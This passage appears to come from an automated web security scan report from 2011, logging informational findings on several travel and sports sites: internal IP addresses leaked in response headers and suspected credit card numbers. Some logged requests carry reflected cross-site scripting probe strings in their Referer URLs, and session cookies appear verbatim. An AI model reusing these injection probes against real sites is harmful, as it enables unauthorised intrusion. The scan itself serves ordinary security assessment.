<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.123. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fmanchesterunited&width=275&connections=0&stream=no&header=no&height=60 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.186.32
X-Cnection: close
Date: Mon, 03 Oct 2011 01:56:37 GMT
Content-Length: 8552

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
23.124. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=120836677942069&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22fd1ef3c%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=false&height=60&id=51212153078&locale=en_US&sdk=joey&show_faces=false&stream=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.119.45
X-Cnection: close
Date: Mon, 03 Oct 2011 00:02:49 GMT
Content-Length: 7701

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
23.125. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fmanchesterunited&width=303&colorscheme=dark&connections=0&stream=no&header=no&height=60 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.110.60
X-Cnection: close
Date: Mon, 03 Oct 2011 01:56:33 GMT
Content-Length: 8605

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
23.126. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js?pubid=c3919e40-e5b8-49f8-b876-4fed1f31968f HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=424937091139EAD10A8AF0C7310701E7.p0524; TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; TVLY_LOCALE=us; popunder=yes; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742; mbox=session#1317600481056-80236#1317604116|PC#1317600481056-80236.19#1318811856|check#true#1317602316; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.4.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:13 GMT
Server: Apache
Set-Cookie: JSESSIONID=32EE0BFDF00A186104ECA2853385BA07.p0527; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.61
P3P: policyref="http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/p3p/p3p.xml",CP="NOI DSP CURa ADMa DEVa OUR IND UNI COM NAV"
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Connection: close
Content-Length: 2401

var DrfGlobals = {
   sid:"33637923-4b56-4634-b850-17368e8cd432", // session id
   pid:"c3919e40-e5b8-49f8-b876-4fed1f31968f", // publisher id
   pti:"default", // page type id
   src:"none", // source
   
...[SNIP]...
23.127. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js?pubid=c3919e40-e5b8-49f8-b876-4fed1f31968f HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=85194181F8EF5609A9FA7C933BC61666.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
P3P: policyref="http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/p3p/p3p.xml",CP="NOI DSP CURa ADMa DEVa OUR IND UNI COM NAV"
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Connection: close
Content-Length: 2401

var DrfGlobals = {
   sid:"bfa7dd53-c988-458c-86df-52443affccb8", // session id
   pid:"c3919e40-e5b8-49f8-b876-4fed1f31968f", // publisher id
   pti:"default", // page type id
   src:"none", // source
   
...[SNIP]...
23.128. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js?pubid=c3919e40-e5b8-49f8-b876-4fed1f31968f HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=424937091139EAD10A8AF0C7310701E7.p0524; TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; TVLY_LOCALE=us; popunder=yes; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742; mbox=session#1317600481056-80236#1317604116|PC#1317600481056-80236.19#1318811856|check#true#1317602316; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.4.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:53:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=0A5FCEDBCBBBED69EB649C4587DC58FB.p0526; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.60
P3P: policyref="http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/p3p/p3p.xml",CP="NOI DSP CURa ADMa DEVa OUR IND UNI COM NAV"
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Connection: close
Content-Length: 2401

var DrfGlobals = {
   sid:"33637923-4b56-4634-b850-17368e8cd432", // session id
   pid:"c3919e40-e5b8-49f8-b876-4fed1f31968f", // publisher id
   pti:"default", // page type id
   src:"none", // source
   
...[SNIP]...
23.129. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js?pubid=c3919e40-e5b8-49f8-b876-4fed1f31968f HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm9d4b7--%3E%3Cscript%3Ealert(1)%3C/script%3Ebbc12be6325&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: drft=33637923-4b56-4634-b850-17368e8cd432; JSESSIONID=CE82F85007B28AF8167D5428864C47CE.p0522; TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; TVLY_LOCALE=us; popunder=yes; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.4.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; drft=33637923-4b56-4634-b850-17368e8cd432; mbox=session#1317600481056-80236#1317605007|PC#1317600481056-80236.19#1318812747|check#true#1317603207

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:53:18 GMT
Server: Apache
Set-Cookie: JSESSIONID=87BA20EA585EE31DDE71FC7109F4F38D.p0524; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.58
P3P: policyref="http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/p3p/p3p.xml",CP="NOI DSP CURa ADMa DEVa OUR IND UNI COM NAV"
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Connection: close
Content-Length: 2401

var DrfGlobals = {
   sid:"33637923-4b56-4634-b850-17368e8cd432", // session id
   pid:"c3919e40-e5b8-49f8-b876-4fed1f31968f", // publisher id
   pti:"default", // page type id
   src:"none", // source
   
...[SNIP]...
23.130. http://xml.premierleague.com/crossDomain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xml.premierleague.com
Path:   /crossDomain.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /crossDomain.html HTTP/1.1
Host: xml.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.1.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Tue, 28 Sep 2010 08:48:57 GMT
Content-Type: text/html
Expires: Sun, 02 Oct 2011 23:49:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:49:08 GMT
Content-Length: 3198
Connection: close
Vary: Accept-Encoding

<head>
<script type="text/javascript" src="/js/jquery.js"></script>
<script type="text/javascript">
function getContentCallback(ajxUrl, ajxType, ajxCache, ajxDataType, callBackSuccess,
...[SNIP]...
<!-- PTV Cache: perwinche03/10.2.53.203 Tue, 06 Apr 2010 12:01:06 GMT / 0 (0) -->
24. Credit card numbers disclosed  previous  next
There are 3 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

24.1. http://www.cheaptickets.com/shop/hotelsearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /shop/hotelsearch

Issue detail

The following credit card number was disclosed in the response:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMzI1NzUwfEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=cheaptickets.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 432985


...[SNIP]...
"{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/445/21445/Holiday-Inn-Hotel-Suites-BOSTON-PEABODY-Hotel-Exterior-41-20110820-190324-704_thumb.jpg&#034;
           }
   }" />
...[SNIP]...
24.2. http://www.expedia.com/Hotel-Search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The following credit card number was disclosed in the response:

Request

POST /Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Content-Length: 1082
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/pubspec/scripts/eap.asp?olacid=US.BD.ORBITZ.HOTEL.HOTEL&GOTO=HotSearch&CityName=bos&InDate=10/09/2011&OutDate=10/16/2011&numroom=1&NumAdult1=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; bn_u=7520316067152911274; COOKIECHECK=1

action=hotelPackageWizard%40searchHotelOnly&packageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_inpPackageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetContro
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: iEAPID=00,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:38:31 GMT; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:38:31 GMT; Path=/
Content-Length: 606333

<!DOCTYPE html><DIV ID="interstitialServerPush1" style="display:block">

<!--Table here is required so that we can center the page in all displays-->
<table class="basicInterstialWidget" border="0
...[SNIP]...
           data-onclick="submitRDLinkAction('b7b37d4f-7c5a-4aa3-b0b7-ec2e3e153900', '496516', '456.43', '', 'qscr=rsvd&from=f&shtl=1&fgds=0&favl=0&htsd=0&flag=1&fsam=1&mony=&have=&smgt=0&htid=2558&ihtl=2&hart=4965161940127&pqar=456.43&piids=b7b37d4f-7c5a-4aa3-b0b7-ec2e3e153900&itid=&itty=&itdx=&rfrr=-56908', 'bG1udmxr', '-56908'); hrdCtrl.trackHotelClick(this,'-56908',4,'456.43','ESR','2558','N','3'); return false;">
...[SNIP]...
24.3. http://www.orbitz.com/shop/hotelsearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The following credit card number was disclosed in the response:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=orbitz&grp=9705&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B141652382%3B20702477%3Ba%3Fhttp%3A%2F%2Fwww.orbitz.com%2Fpsi%3Ftype%3Dhotel%26market%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26checkin%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm-dd%22%7D%26checkout%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm-dd%22%7D%26guests%3D%24%7Badults%7D%26rooms%3D%24%7Brooms%7D%26WT.mc_id%3Do_igo_merch_city_dated%26WT.mc_ev%3Dclick%26gcid%3DC11287x600-CY%24%7Bcity%7D%2C%24%7Bcountryn%7D&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=153&pos=0&aii=e3898191-1452-431e-82b6-c9f881ca9a4c&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:24:10 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA2MDM3OTd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToxMDowMyBQTXwgfCA="; Version=1; Domain=orbitz.com; Max-Age=2592000; Expires=Wed, 02-Nov-2011 00:10:03 GMT; Path=/
